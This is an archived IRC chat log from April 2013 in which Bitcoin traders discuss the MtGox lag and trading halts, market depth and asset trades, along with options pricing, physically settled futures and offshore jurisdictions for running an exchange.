00:07:17 i'm just too tired to care about mt gox anymore (i've never actually used their exchange) Apr 14 00:07:57 new low Apr 14 00:09:03 now the lag figure comes back Apr 14 00:09:06 ;;goxlag Apr 14 00:09:07 MtGox lag is 418.186162 seconds. During this time, light travels 0.838040386402 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 14 00:09:37 7am here Apr 14 00:09:48 another succesful night Apr 14 00:16:11 !t h him Apr 14 00:16:13 [HAVELOCK:HIM] 1D: 1.42000000 / 1.52325 / 1.55000000 (40 shares, 60.93000000 BTC), 7D: 0.75000001 / 1.43929106 / 1.93000000 (302 shares, 434.66590011 BTC), 30D: 0.75000001 / 1.72087506 / 2.08000000 (822 shares, 1414.55930041 BTC) Apr 14 00:17:12 i believe bitfloor is still over 100 Apr 14 00:18:41 it's funny if you look it says 864901usd for buying BTC on btc-e but if look at the order book below it doesn't come close the buy walls are way lower then the 80's Apr 14 00:19:17 "Trade engine cooldown (lag too high), order placing suspended until 2013-04-13 21:30:00 UTC" Apr 14 00:19:27 Fuckin Gox?!? Apr 14 00:19:39 [BTCTC] [RSM] 1 @ 0.00121 BTC [+] Apr 14 00:19:42 [BTCTC] [RSM] 10 @ 0.0012 = 0.012 BTC [-] Apr 14 00:19:47 They're doing this everytime the price tries to go down... fuckers Apr 14 00:20:44 this is why i am not paying attention to them Apr 14 00:20:48 too much distortion Apr 14 00:20:54 price discovery is ruined there Apr 14 00:20:58 LOL Apr 14 00:21:03 Sat Apr 13 21:20:54 UTC 2013 Apr 14 00:21:07 if you want to sell, i'd say transfer your coins, and find somewhere else Apr 14 00:21:26 !t b ASICMINER-PT Apr 14 00:21:27 The round stones beneath the earth... have spoken through the fire. Apr 14 00:21:28 you won't get the real value at gox Apr 14 00:23:07 ;;ticker Apr 14 00:23:17 Error: Failure to retrieve ticker. Try again later. Apr 14 00:24:44 this is what i mean though, they keep halting trading, lag is horrible, impossible to get good price discovery Apr 14 00:24:53 <@gribble> BTCUSD ticker | Best bid: 92.00000, Best ask: 93.68822, Bid-ask spread: 1.68822, Last trade: 93.68822, 24 hour volume: 270184.75339750, 24 hour low: 85.81638, 24 hour high: 130.00000, 24 hour vwap: 110.44672 Apr 14 00:25:02 circa 45 sec ago Apr 14 00:27:33 no, I already sold my coins Apr 14 00:27:40 like at the peak =P Apr 14 00:27:47 Just trying to daytrade >.> Apr 14 00:27:54 and I get that notice... Apr 14 00:27:58 Namworld: you buying back in? Apr 14 00:28:08 wait Apr 14 00:28:15 just a bit to resell on upswings Apr 14 00:28:21 trying to daytrade Apr 14 00:28:37 since there's no trading fees right now anyway Apr 14 00:28:48 apt description - it take about a day to get your trade off at gox... Apr 14 00:30:46 yeah Apr 14 00:39:26 ;;bids 0 Apr 14 00:39:31 There are currently 44205127 bitcoins demanded at or over 0.0 USD, worth 13852258.158 USD in total. | Data vintage: 0.0097 seconds Apr 14 00:40:29 [BTCTC] [RSM] 3 @ 0.0012 = 0.0036 BTC [-] Apr 14 00:40:45 lot a coin - new low Apr 14 00:42:35 i specifically think that cash transfers in are held up... Apr 14 00:42:49 though there may be less of that due to confusion Apr 14 00:43:10 cash out of gox? really? anyone experiencing that? Apr 14 00:43:20 cash transfers in i think Apr 14 00:43:28 localtill has notice about mass influx of ppl and delays Apr 14 00:44:02 that is what i am thinking Apr 14 00:44:09 cash coming in is lagging too Apr 14 00:44:15 but bitcoin can be moved easily Apr 14 00:44:21 pretty ironic actually Apr 14 00:44:21 there is no decent way to do it right now Apr 14 00:44:26 i see Apr 14 00:44:41 sellers of bitcoin can do it easier because of how well bitcoin works Apr 14 00:44:57 while buyers of bitcoin find it a lot harder because of the problem that bitcoin fixes Apr 14 00:45:51 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] Apr 14 00:48:59 it is also funny because look how long it takes to get a wallet (10 minutes maybe) vs opening an account with gox (10 days) Apr 14 00:57:59 [BTCTC] [RSM] 1 @ 0.00158 BTC [+] Apr 14 01:01:29 106 on bitfloor Apr 14 01:05:09 wtf is going on? Apr 14 01:05:30 lol Apr 14 01:06:01 ;;ticker Apr 14 01:06:02 BTCUSD ticker | Best bid: 106.00000, Best ask: 107.00000, Bid-ask spread: 1.00000, Last trade: 107.00000, 24 hour volume: 271659.47224216, 24 hour low: 85.50000, 24 hour high: 130.00000, 24 hour vwap: 110.06013 Apr 14 01:23:14 anybody want to buy bitfunder FIAT.USD? Apr 14 01:37:38 ;;ticker Apr 14 01:37:39 BTCUSD ticker | Best bid: 99.95922, Best ask: 100.00000, Bid-ask spread: 0.04078, Last trade: 100.00000, 24 hour volume: 256355.09573227, 24 hour low: 85.50000, 24 hour high: 130.00000, 24 hour vwap: 110.70365 Apr 14 01:39:20 anybody interested in bitfunder fiat.USD. willing to negotiate Apr 14 01:39:26 !asks 0 Apr 14 01:41:21 [BTCTC] [BTC-BOND] 998 @ 0.01 = 9.98 BTC [-] Apr 14 01:43:21 [BTCTC] [RSM] 1 @ 0.00141 BTC [-] Apr 14 01:44:42 [BTCTC] [RSM] 1 @ 0.00141 BTC [-] Apr 14 01:50:19 ;;bids 70 Apr 14 01:50:22 There are currently 44077.116 bitcoins demanded at or over 70.0 USD, worth 3582388.69964 USD in total. | Data vintage: 0.0045 seconds Apr 14 01:51:40 ;;bids 50 Apr 14 01:51:40 There are currently 111597.63 bitcoins demanded at or over 50.0 USD, worth 7394789.86558 USD in total. | Data vintage: 78.6505 seconds Apr 14 01:51:54 woa only $20 diff Apr 14 01:52:05 more than doubles..hmm Apr 14 01:52:33 ;;bids 60 Apr 14 01:52:35 There are currently 68666.837 bitcoins demanded at or over 60.0 USD, worth 5118822.40047 USD in total. | Data vintage: 0.0057 seconds Apr 14 01:55:56 downturn starts within 2 minutes, methinks Apr 14 01:57:33 [MPEX] [S.MPOE] 2550 @ 0.00070377 = 1.7946 BTC [-] Apr 14 01:57:37 [MPEX] [S.MPOE] 7000 @ 0.00069882 = 4.8917 BTC [-] Apr 14 01:57:39 [MPEX] [S.MPOE] 5190 @ 0.00069532 = 3.6087 BTC [-] Apr 14 01:59:51 prediction fail Apr 14 02:00:39 book depth looks strong down to $70: http://bitcoincharts.com/markets/mtgoxUSD_depth.html Apr 14 02:00:51 but... heh, who would want to trade gox? Apr 14 02:02:04 ;;goxlag Apr 14 02:02:05 MtGox lag is 21.636523 seconds. During this time, light travels 0.0433593498374 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 14 02:02:10 ;;ticker --last Apr 14 02:02:10 100.00000 Apr 14 02:03:50 [BTCTC] [ASICMINER-PT] 1 @ 0.819982 BTC [+] Apr 14 02:05:02 [BTCTC] [ASICMINER-PT] 1 @ 0.819983 BTC [+] Apr 14 02:05:21 [BTCTC] [ASICMINER-PT] 1 @ 0.819985 BTC [+] Apr 14 02:05:48 [BTCTC] [ASICMINER-PT] 11 @ 0.82 = 9.02 BTC [+] Apr 14 02:06:11 [BTCTC] [ASICMINER-PT] 9 @ 0.822 = 7.398 BTC [+] Apr 14 02:09:56 [HAVELOCK] [HIM] 10 @ 1.54 = 15.4 BTC [-] Apr 14 02:14:03 smickles: hi Apr 14 02:14:10 ;;seen smickles Apr 14 02:14:10 smickles was last seen in #bitcoin-assets 1 week, 2 days, 7 hours, 31 minutes, and 42 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 14 02:21:42 ;;bids 90 Apr 14 02:21:45 There are currently 11300.548 bitcoins demanded at or over 90.0 USD, worth 1071065.90632 USD in total. | Data vintage: 0.0046 seconds Apr 14 02:22:43 where are cheap coins? Apr 14 02:33:13 *hanbot* beats Apr 14 02:41:11 [BTCTC] [LTC-MINING] 1 @ 0.34595 BTC [+] Apr 14 02:42:18 [BTCTC] [LTC-MINING] 8 @ 0.34596 = 2.7677 BTC [+] Apr 14 02:45:09 [BTCTC] [B.YABMC] 99 @ 0.01499 = 1.484 BTC [-] Apr 14 02:46:55 [HAVELOCK] [HIM] 1 @ 1.6 BTC [+] Apr 14 02:47:56 [HAVELOCK] [VTX] 1 @ 0.3874 BTC [+] Apr 14 02:49:09 [BTCTC] [SYNERGY] 6 @ 0.11 = 0.66 BTC [+] Apr 14 02:51:04 [BTCTC] [SYNERGY] 7 @ 0.119 = 0.833 BTC [+] Apr 14 02:54:46 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [-] Apr 14 02:56:40 [BTCTC] [LTC-MINING] 1 @ 0.34595 BTC [-] Apr 14 03:00:17 [BTCTC] [SYNERGY] 5 @ 0.119 = 0.595 BTC [+] Apr 14 03:00:55 [HAVELOCK] [SDICE] 689 @ 0.35 = 241.15 BTC [+] Apr 14 03:02:02 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [-] Apr 14 03:02:30 !t h sdice Apr 14 03:02:32 [HAVELOCK:SDICE] 1D: 0.33500001 / 0.34968039 / 0.35000000 (747 shares, 261.21125000 BTC), 7D: 0.12500000 / 0.31245602 / 0.37000000 (2073 shares, 647.72133729 BTC), 30D: 0.12500000 / 0.38628791 / 0.59999900 (8030 shares, 3101.89191280 BTC) **** BEGIN LOGGING AT Sun Apr 14 11:19:45 2013 Apr 14 11:36:17 [MPEX] [S.MPOE] 14751 @ 0.00070247 = 10.3621 BTC [+] Apr 14 11:42:00 [BTCTC] [S.BBET-PT] 1 @ 0.00195 BTC [-] Apr 14 11:47:02 [HAVELOCK] [VTX] 1 @ 0.385 BTC [-] Apr 14 11:53:42 [BTCTC] [BASIC-MINING] 2 @ 0.41 = 0.82 BTC [+] Apr 14 11:54:22 ;;ticker Apr 14 11:54:23 BTCUSD ticker | Best bid: 103.50000, Best ask: 104.99991, Bid-ask spread: 1.49991, Last trade: 103.50000, 24 hour volume: 179212.74308339, 24 hour low: 85.50000, 24 hour high: 117.90000, 24 hour vwap: 103.55658 Apr 14 11:54:32 heh, in the 100 to 130 corridor huh ? Apr 14 11:54:33 nice. Apr 14 11:57:10 Apr14 08:55:52 mtgox x207 4,302.5790 @ 101.26449787 USD Apr 14 11:57:11 oh oh oh Apr 14 12:06:02 [HAVELOCK] [VTX] 74 @ 0.3874 = 28.6676 BTC [+] Apr 14 12:06:03 [HAVELOCK] [VTX] 20 @ 0.3874 = 7.748 BTC [+] Apr 14 12:06:05 [HAVELOCK] [VTX] 30 @ 0.39 = 11.7 BTC [+] Apr 14 12:06:05 [HAVELOCK] [VTX] 1 @ 0.39 BTC [+] Apr 14 12:08:01 [HAVELOCK] [SDICE] 2 @ 0.365 = 0.73 BTC [+] Apr 14 12:08:03 [HAVELOCK] [SDICE] 7 @ 0.3659 = 2.5613 BTC [+] Apr 14 12:08:04 [HAVELOCK] [SDICE] 1 @ 0.3659994 BTC [+] Apr 14 12:08:05 [HAVELOCK] [SDICE] 8 @ 0.3659995 = 2.928 BTC [+] Apr 14 12:08:06 [HAVELOCK] [SDICE] 1 @ 0.393 BTC [+] Apr 14 12:08:07 [HAVELOCK] [SDICE] 14 @ 0.3935 = 5.509 BTC [+] Apr 14 12:08:09 [HAVELOCK] [SDICE] 25 @ 0.394 = 9.85 BTC [+] Apr 14 12:08:10 [HAVELOCK] [SDICE] 20 @ 0.3999999 = 8 BTC [+] Apr 14 12:08:11 [HAVELOCK] [SDICE] 10 @ 0.4 = 4 BTC [+] Apr 14 12:11:10 [BTCTC] [S.DICE-PT] 1 @ 0.004 BTC [-] Apr 14 12:11:43 [BTCTC] [BTC-BOND] 9 @ 0.01 = 0.09 BTC [-] Apr 14 12:11:47 [BTCTC] [S.DICE-PT] 229 @ 0.004 = 0.916 BTC [-] Apr 14 12:12:50 [BTCTC] [S.DICE-PT] 10 @ 0.0039 = 0.039 BTC [-] Apr 14 12:14:44 [BTCTC] [S.BBET-PT] 6 @ 0.00223 = 0.0134 BTC [+] Apr 14 12:18:24 [BTCTC] [ASICMINER-PT] 1 @ 0.804 BTC [-] Apr 14 12:18:58 [BTCTC] [ASICMINER-PT] 3 @ 0.8031 = 2.4093 BTC [-] Apr 14 12:20:33 [BTCTC] [S.DICE-PT] 1 @ 0.00361 BTC [-] Apr 14 12:20:36 [BTCTC] [S.DICE-PT] 30 @ 0.0036 = 0.108 BTC [-] Apr 14 12:20:40 [BTCTC] [S.DICE-PT] 1 @ 0.0036 BTC [-] Apr 14 12:20:48 [BTCTC] [S.DICE-PT] 4 @ 0.00353 = 0.0141 BTC [-] Apr 14 12:20:58 [BTCTC] [S.DICE-PT] 19 @ 0.0035 = 0.0665 BTC [-] Apr 14 12:29:04 [BTCTC] [RSM] 1 @ 0.00178 BTC [-] Apr 14 12:32:18 [BTCTC] [RSM] 1 @ 0.00178 BTC [-] Apr 14 12:33:32 [BTCTC] [BASIC-MINING] 8 @ 0.41 = 3.28 BTC [+] Apr 14 12:35:27 [BTCTC] [BASIC-MINING] 2 @ 0.41 = 0.82 BTC [+] Apr 14 12:36:54 [BTCTC] [RSM] 1 @ 0.00178 BTC [-] Apr 14 12:51:02 [HAVELOCK] [SDICE] 3 @ 0.40789999 = 1.2237 BTC [+] Apr 14 13:08:29 https://bitcointalk.org/index.php?topic=174600.0;all Apr 14 13:08:34 bitcoin-24 apparently cocked up ? Apr 14 13:09:49 That's kind of part of the problem Apr 14 13:10:04 of why people keep using MtGox even if it keeps failing Apr 14 13:11:03 Needs a better trading platform but trading elsewhere than MtGox can be risky. Apr 14 13:14:43 heh. Apr 14 13:14:50 i see what you mean. Apr 14 13:15:01 of course... i see mtgox as quite as risky myself Apr 14 13:15:12 but then again i guess people have this too big to fail mentality going. Apr 14 13:17:25 Well they could. I see it more as a longstanding history of not getting hacked out of all users funds. There was hacks but they at least protect their BTC wallet. Apr 14 13:18:18 You can't review code/measures unfortunately Apr 14 13:18:57 How many other platforms again and again, despite it occuring regularly, popped up with all funds on a hot wallet only to get it all stolen? Apr 14 13:19:32 [MPEX] [S.MPOE] 10499 @ 0.00071058 = 7.4604 BTC [+] Apr 14 13:19:39 They know others were hacked but somehow don't protect their wallet still, despite having more than a fair warning that's not something to do. Apr 14 13:19:54 Anyway Apr 14 13:20:56 well take bitcoin-central. Apr 14 13:21:07 they've done about the same thing, been in business for about the same interval etc. Apr 14 13:21:31 on the other hand people like bitfloor indeed don't opr at least didn't protect the walletr worth a shiot. Apr 14 13:22:57 yeah Apr 14 13:23:18 oh, I've made another chart of prices compared to the 2011 bubble in it's last days Apr 14 13:23:25 show Apr 14 13:23:27 link? Apr 14 13:23:31 http://i.imgur.com/LWGXliJ.png Apr 14 13:23:41 ty! Apr 14 13:23:53 It mirrors the 2011 almost perfectly, albeit on a different price scale Apr 14 13:24:00 eerie Apr 14 13:24:46 well in as much as there's rebound oscialltions after yeah Apr 14 13:25:05 but to my eye the rise and the fall are pretty distinct Apr 14 13:25:06 Disclaimer: **similarities does not guarantee same outcome** Apr 14 13:25:19 i mean june had a pronounced bear trap on the way up Apr 14 13:25:21 april did not. Apr 14 13:25:38 april collapse was very deep and rebound sharply Apr 14 13:25:40 early on Apr 14 13:25:44 june did no such thing Apr 14 13:26:10 Indeed, it's not a perfect replica. Apr 14 13:26:28 how did you obtain red line ? Apr 14 13:26:33 is it by some math or just hand drawn ? Apr 14 13:26:56 vague, hand drawn following of prices Apr 14 13:27:00 a Apr 14 13:27:01 Not very accurate Apr 14 13:27:09 that's dangerous as it may contain a lot of bias Apr 14 13:27:15 sorta "see what you expect to see" thing Apr 14 13:27:22 True Apr 14 13:27:59 Albeit the drop was much steeper, resulting in a large gap in prices, which might have helped the rebound Apr 14 13:28:20 usually we see more rebounds/stronger ones on sharper movements Apr 14 13:31:42 Hmm, quite late it seems. ALready morning... I'll be on my way I think. Apr 14 13:31:49 Goodbye Apr 14 13:33:10 later Apr 14 13:38:50 [BTCTC] [ASICMINER-PT] 1 @ 0.8031 BTC [-] Apr 14 13:41:04 mircea popescu- you know what...2011 didn't have something we have now.. Apr 14 13:41:15 Fox News and Kudlow? Attention.. Apr 14 13:41:57 mircea is alive, fox news lied to me Apr 14 13:42:04 lolk Apr 14 13:42:45 don't panic sell, mircea is alive and well :) Apr 14 13:42:53 lol Apr 14 13:42:59 In Mircea we trust Apr 14 13:43:22 not that fox news and kudlow are the standard or anything..just using them as an example Apr 14 13:43:22 trust, but verify. Apr 14 13:43:48 so glad we survived that crisis Apr 14 13:43:54 almost had to fake my death Apr 14 13:44:21 anyone scoop some nice cheap coins? :) Apr 14 13:44:56 "satoshi's miracle" 3 more before we have to decalre him a saint Apr 14 13:52:01 The French government announced that starting this week, ketchup will no longer be allowed in any school or university cafeteria Apr 14 13:52:10 what's north korea got ? Apr 14 14:00:52 ;;ticker Apr 14 14:00:53 BTCUSD ticker | Best bid: 100.72001, Best ask: 101.33741, Bid-ask spread: 0.61740, Last trade: 100.71001, 24 hour volume: 181415.51969588, 24 hour low: 85.50000, 24 hour high: 117.88999, 24 hour vwap: 102.31635 Apr 14 14:00:56 dammit Apr 14 14:01:00 i want my free coins Apr 14 14:01:01 a little man with an ego Apr 14 14:03:18 lol free coins for what Apr 14 14:08:49 for whta? Apr 14 14:08:53 for buyin! Apr 14 14:14:21 ill take some free coins..im poor man just tryin to make it in this world Apr 14 14:14:55 might not be much to you, but its a big deal to me Apr 14 14:16:20 ill tell you a joke in return :D Apr 14 14:17:29 kimcoin Apr 14 14:17:37 use it or we'll kill gas your family Apr 14 14:17:47 dont worry, everything gets settled when we die if not sooner. Apr 14 14:18:00 havethe sucides stopped? Apr 14 14:23:47 Theres more coming. Apr 14 14:24:14 That dude who put up his family's home for BTC at $160 is about due. Apr 14 14:24:25 Hope you all can sleep good at night. Apr 14 14:24:36 I know I can =D Apr 14 14:24:57 The BTC helps hehe Apr 14 14:27:55 morning all Apr 14 14:28:54 hi Apr 14 14:29:29 http://trilema.com/2013/discovering-the-secret-villanies-of-alluring-strumpets/ Apr 14 14:29:35 for the classically-minded. Apr 14 14:34:25 interesting post, mp Apr 14 14:35:06 the bitcoin "symbol" on the pants is priceless Apr 14 14:35:36 [BTCTC] [RSM] 6 @ 0.00179 = 0.0107 BTC [+] Apr 14 14:35:44 :) Apr 14 14:36:04 lol Apr 14 14:40:27 clap clap Apr 14 14:42:13 made $500 in my sleep last night with filled bids and asks :) Apr 14 14:43:13 $avg Apr 14 14:43:15 pgp: 101.38 Apr 14 14:44:12 ;;ticker Apr 14 14:44:13 BTCUSD ticker | Best bid: 104.11100, Best ask: 104.70999, Bid-ask spread: 0.59899, Last trade: 104.11100, 24 hour volume: 181576.37623180, 24 hour low: 85.50000, 24 hour high: 117.88999, 24 hour vwap: 102.05784 Apr 14 14:44:26 so we're back to normal? Apr 14 14:44:38 nah Apr 14 14:45:02 [HAVELOCK] [SDICE] 44 @ 0.4 = 17.6 BTC [-] Apr 14 14:45:13 seems pretty normal to me. Apr 14 14:45:18 is trading open on mtgox? Apr 14 14:45:23 yes Apr 14 14:45:26 and lag is gone Apr 14 14:45:29 great- Apr 14 14:45:47 fees are back too Apr 14 14:46:03 mp: is the bot ever gonna price puts below 1 ? Apr 14 14:46:44 i am considering an algo adjustement. we're doing a bunch of modelling and measuring. Apr 14 14:46:54 sweet Apr 14 14:46:56 in no case will this be before the end of the month however. Apr 14 14:47:04 i suspected Apr 14 14:47:12 was about to say i think bit is done for the month Apr 14 14:47:17 bot* Apr 14 14:47:24 noted Apr 14 14:47:42 can't make changes midmonth, especially as they'd be towards a reduction of premiums Apr 14 14:47:54 as it'd be unfair to bondholders (whether any harm comes to them from it or not) Apr 14 14:48:00 plus it still could crash to 25 Apr 14 14:48:02 :) Apr 14 14:48:04 this on top of the usual consideration of just letting things be. Apr 14 14:48:38 I understand... I am wonderering, though, has anyone bought any of these infinite vol options? Apr 14 14:49:13 haven;'t had muich trade since the huge swings, no. Apr 14 14:49:24 notably pretty much noboduy is goiong in the midmarket either, Apr 14 14:49:29 in spite of the huge spreads. Apr 14 14:49:39 not yet ;-) Apr 14 14:49:42 yeah. Apr 14 14:49:48 i9t's been days tho. Apr 14 14:50:09 anyway, i think the financial tier is well spooked by all the insanity propagated at the exchange tier. Apr 14 14:50:35 just all the wash trading going on strictly for mtgox's desire to keep on lieing about its market share should be enough of a problem Apr 14 14:50:36 yes... Apr 14 14:50:50 but there's tons of other issues. so i think pretty m,uch everyotne's models are off the charts, Apr 14 14:50:54 that's my view as well Apr 14 14:50:59 they just have the advantage of not printing this as mpoe bot does. Apr 14 14:51:13 well, "advantage" Apr 14 14:53:11 mp: have yuo considered an RBH model for short calls, or do you see the hassle as not being worth the extra liquidity? Apr 14 14:54:07 understand for bond holder's - fixed risk, but for other participants... Apr 14 14:54:25 an upgrade to a more ellaborate model (such as but not necessarily limited to or equal with rbh) has been in the plan since 2011. Apr 14 14:54:34 however, we don't have the market to support it yet is my estimation. Apr 14 14:55:10 certainly the idea is to keep financial instruments as sophisticated as can be borne. Apr 14 14:55:47 hmmm... I think that what you need is more brokers... Apr 14 14:56:15 and third party platform support to make the options less arcane... Apr 14 14:56:19 certainly more brokers wouldn't hurt. Apr 14 14:56:28 been thinking a lot about that lately Apr 14 14:57:06 truth of the matter is there;'s plenty of room to get mpex stuff packaged as a sellable vehicvle. both equities and derivatives (diff, fiat, etc) Apr 14 14:57:20 the more brokers thing could improve soon... Apr 14 14:57:23 this could be done via hedge funds or via other vehicles, but yeah Apr 14 14:58:08 the thing is, most of this is yet immature. take the idiff futures as a great example. it will be a great instrument down the road buyt for now the underlying is just too nonsensical. Apr 14 14:58:25 (and the people who really need the instrument, ie miners, are much too financially clueless) Apr 14 14:59:03 mp: i don't think that you really have to do much more than you already are... your focus on security and availability is what makes MPEX attractive Apr 14 14:59:48 yes, i was about to say : a simple way to test rbh specifically is to just open a brokerage offering rbh-based leverage to customers. Apr 14 14:59:51 marketing Apr 14 15:00:19 this is much better than exchange-level implementation because it's so much easier to limit things. throw 1k btc at this project see how long it takes you to lose it all. Apr 14 15:00:39 fold orderly, you've contributed no market instability and in fact an orderly folding is better for one's reputation than continued success. Apr 14 15:01:12 [BTCTC] [COG.F] 1 @ 2.15 BTC [+] Apr 14 15:01:13 I've implemented real-time RBH - its a hassle - and its arcane, but intellectually satisfying from a risk management standpoint Apr 14 15:01:26 more generally the limited capital and orderly folding is a very important concept that i've been discussing with other people looking to make financial instruments in thsi chan Apr 14 15:01:40 it's crucial for further development i think. Apr 14 15:01:54 there's a reason llc companies irl list their capital. Apr 14 15:01:55 agreed Apr 14 15:02:02 [HAVELOCK] [VTX] 1 @ 0.39 BTC [+] Apr 14 15:02:03 [HAVELOCK] [VTX] 1 @ 0.3968 BTC [+] Apr 14 15:02:04 [HAVELOCK] [VTX] 80 @ 0.3968 = 31.744 BTC [+] Apr 14 15:02:06 [HAVELOCK] [VTX] 100 @ 0.3969 = 39.69 BTC [+] Apr 14 15:02:07 [HAVELOCK] [VTX] 2 @ 0.397 = 0.794 BTC [+] Apr 14 15:02:08 [HAVELOCK] [VTX] 10 @ 0.39797 = 3.9797 BTC [+] Apr 14 15:02:08 [HAVELOCK] [VTX] 49 @ 0.39798 = 19.501 BTC [+] Apr 14 15:02:09 [HAVELOCK] [VTX] 4 @ 0.39798 = 1.5919 BTC [+] Apr 14 15:02:10 [HAVELOCK] [VTX] 23 @ 0.39799 = 9.1538 BTC [+] Apr 14 15:02:11 [HAVELOCK] [VTX] 25 @ 0.399 = 9.975 BTC [+] Apr 14 15:02:12 [HAVELOCK] [VTX] 2 @ 0.4 = 0.8 BTC [+] Apr 14 15:02:15 most likely i'll be starting an options fund Apr 14 15:02:25 currently everyone is play-pretending this "unlimited theoretical liability" angle. it's just not workable in any practical way. Apr 14 15:02:28 [BTCTC] [COG.F] 1 @ 2.30333 BTC [+] Apr 14 15:02:36 it's a fiction, and financial fiction never happy ends Apr 14 15:02:53 similar to jurov's bond offerings Apr 14 15:03:06 ThickAsThieves that may work nicel.y Apr 14 15:03:19 i have much of it mapped out Apr 14 15:03:27 and a green light from the exchange Apr 14 15:03:35 just need to write it up Apr 14 15:05:53 futures is what we really need... Apr 14 15:06:21 you mean hash futures specifically ? Apr 14 15:06:52 BTC futures... Apr 14 15:07:33 cash settled based on 24h avg Apr 14 15:07:39 ah. yeah, i've been talking to people. i will list futures, but i will only list physically settled. Apr 14 15:07:46 so there must be someone with the ability to make deliveries. Apr 14 15:07:59 nah, monthly settled by actual delivery. Apr 14 15:08:28 cash settled is meaningless bullshit practically indistinguishable from a scam. Apr 14 15:08:46 except that means dealing with fiat Apr 14 15:09:03 whoever runs the future will have to yes Apr 14 15:09:15 so it's pretty much limited to the exchanges. few actuallty have the sense to know wtf this all is so... Apr 14 15:09:32 are you prepared to deal with fiat? Apr 14 15:09:43 me ? what business of mine is it ? Apr 14 15:10:13 seems to me like you've created something that will evade regulation for a long time because it's strickly BTC Apr 14 15:10:32 fiat is a pain Apr 14 15:10:40 agreed Apr 14 15:11:05 pgp the idea is for someone who has the ability to make fiat settlements to run the future. Apr 14 15:11:13 this would be an exchange for many practical reasons Apr 14 15:11:16 i see Apr 14 15:11:18 also because they'd have to marketmake it Apr 14 15:11:25 which they'd be in the best position to do. Apr 14 15:11:28 of course. Apr 14 15:11:35 it really is a perfectly valid and probably profityable niche. Apr 14 15:12:00 but then again, i participate in 20+ discussions a day, all end with "yes, this is yet another niche, just need the people with a clue to do it" Apr 14 15:12:03 I wouldn't want to try it in the US... Apr 14 15:12:19 CTFC would freak out Apr 14 15:12:22 if you are already running an exchange you'd better have the paperwork in order already, in which case... Apr 14 15:12:25 no extra burden Apr 14 15:13:00 any opinion on best foreign jurisdictions for this sort of activity? Apr 14 15:13:17 anywhere you have a banking license as first choice. Apr 14 15:13:56 yeah Apr 14 15:14:12 i really think the best way to go is partner with licensed institutions rather than try and do bermudadollars or w/e Apr 14 15:14:50 prolly Apr 14 15:15:03 there's what, 150 countries in this world. each has at least five banks. Apr 14 15:15:16 you tell me out of 10k banks there's not a single one you can partner with ? that seems improbable. Apr 14 15:15:18 panamanian govt seems very user friendly... Apr 14 15:15:35 might work. Apr 14 15:15:54 been poking around there Apr 14 15:16:19 gibralter also Apr 14 15:16:32 isn't panama one of the select few countries of which the us kidnapped the head of state ? Apr 14 15:16:56 it is... lots of cache... Apr 14 15:17:47 [MPEX] [S.MPOE] 15050 @ 0.00068692 = 10.3381 BTC [-] Apr 14 15:18:02 [MPEX] [S.MPOE] 6450 @ 0.00068596 = 4.4244 BTC [-] Apr 14 15:21:33 !ticker m s.dice Apr 14 15:21:34 [MPEX:S.DICE] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0027 / 0.00299004 / 0.00409999 (279245 shares, 834.95 BTC), 30D: 0.0027 / 0.00349098 / 0.0058822 (1860600 shares, 6,495.33 BTC) Apr 14 15:22:05 malta ;) Apr 14 15:22:31 cyprus ! wait... not anymore Apr 14 15:22:55 go exotic, Labuan Apr 14 15:23:47 wtf haha labuan... just check if its exist, but yes... Apr 14 15:24:23 malta is not a bad choice, either, govt very interested in attacting new business Apr 14 15:24:50 yes, all big gambling company etc Apr 14 15:24:53 or cyprus Apr 14 15:24:55 the question is more if the govt is capable of defending new business. Apr 14 15:25:01 [HAVELOCK] [VTX] 4 @ 0.404 = 1.616 BTC [+] Apr 14 15:25:21 true dat, mp Apr 14 15:25:27 oh i was late with that one Apr 14 15:25:42 [14:22] cyprus ! wait... not anymore Apr 14 15:25:49 i would have said slovenia a couple weeks ago, but... Apr 14 15:25:55 yep, i suck not reading. Apr 14 15:26:03 what's the problem with slovenia ? Apr 14 15:26:09 just that it's insolvent ? Apr 14 15:26:20 he prolly cant get that cnn video out of his head Apr 14 15:26:21 :(( Apr 14 15:27:00 got the link handy... Apr 14 15:27:13 don't mean to throw salt on the wound... Apr 14 15:27:41 but it's neither here nor there. Apr 14 15:27:46 j/k Apr 14 15:27:51 so it's insolvent. what problem of yours is that ? you bring fiat in. Apr 14 15:28:07 joking Apr 14 15:28:13 o Apr 14 15:28:18 hmm, there may be another btc dump imminent Apr 14 15:28:20 [15:09] ;;bids 75 Apr 14 15:28:20 [15:09] There are currently 39194.986 bitcoins demanded at or over 75.0 USD, worth 3382833.99001 USD in total. | Data vintage: 58.9652 seconds Apr 14 15:28:20 [15:09] ;;asks 175 Apr 14 15:28:20 [15:09] There are currently 48493.234 bitcoins offered at or under 175.0 USD, worth 6706271.46426 USD in total. | Data vintage: 59.7281 seconds Apr 14 15:28:20 [08:26] ;;asks 175 Apr 14 15:28:20 [08:26] ;;bids 75 Apr 14 15:28:20 [08:27] There are currently 67783.678 bitcoins offered at or under 175.0 USD, worth 8961608.15255 USD in total. | Data vintage: 0.0038 seconds Apr 14 15:28:21 [08:27] There are currently 38658.49 bitcoins demanded at or over 75.0 USD, worth 3330653.01159 USD in total. | Data vintage: 0.0102 seconds Apr 14 15:28:29 pastebin omg./ Apr 14 15:28:33 sry Apr 14 15:29:12 20000 new coins on offer Apr 14 15:34:45 ;;market --sell 10000 Apr 14 15:34:47 A market order to sell 10000 bitcoins right now would net 959726.8984 USD and would take the last price down to 91.8351 USD, resulting in an average price of 95.9727 USD/BTC. | Data vintage: 0.0006 seconds Apr 14 15:34:58 ;;market --sell 20000 Apr 14 15:34:59 A market order to sell 20000 bitcoins right now would net 1845892.5144 USD and would take the last price down to 85.0000 USD, resulting in an average price of 92.2946 USD/BTC. | Data vintage: 11.4068 seconds Apr 14 15:37:58 I must say that there is a noticeable *lack* of lag today... all that free market making shit is gone... Apr 14 15:38:02 [BTCTC] [RSM] 66 @ 0.00179 = 0.1181 BTC [+] Apr 14 15:38:44 heh. Apr 14 15:38:56 what's to trade ? they who wanted btc have them, they who wanted dollars have them. Apr 14 15:39:57 would be pretty fun to watch a massive dump without lag Apr 14 15:40:09 ;;bids 32 Apr 14 15:40:11 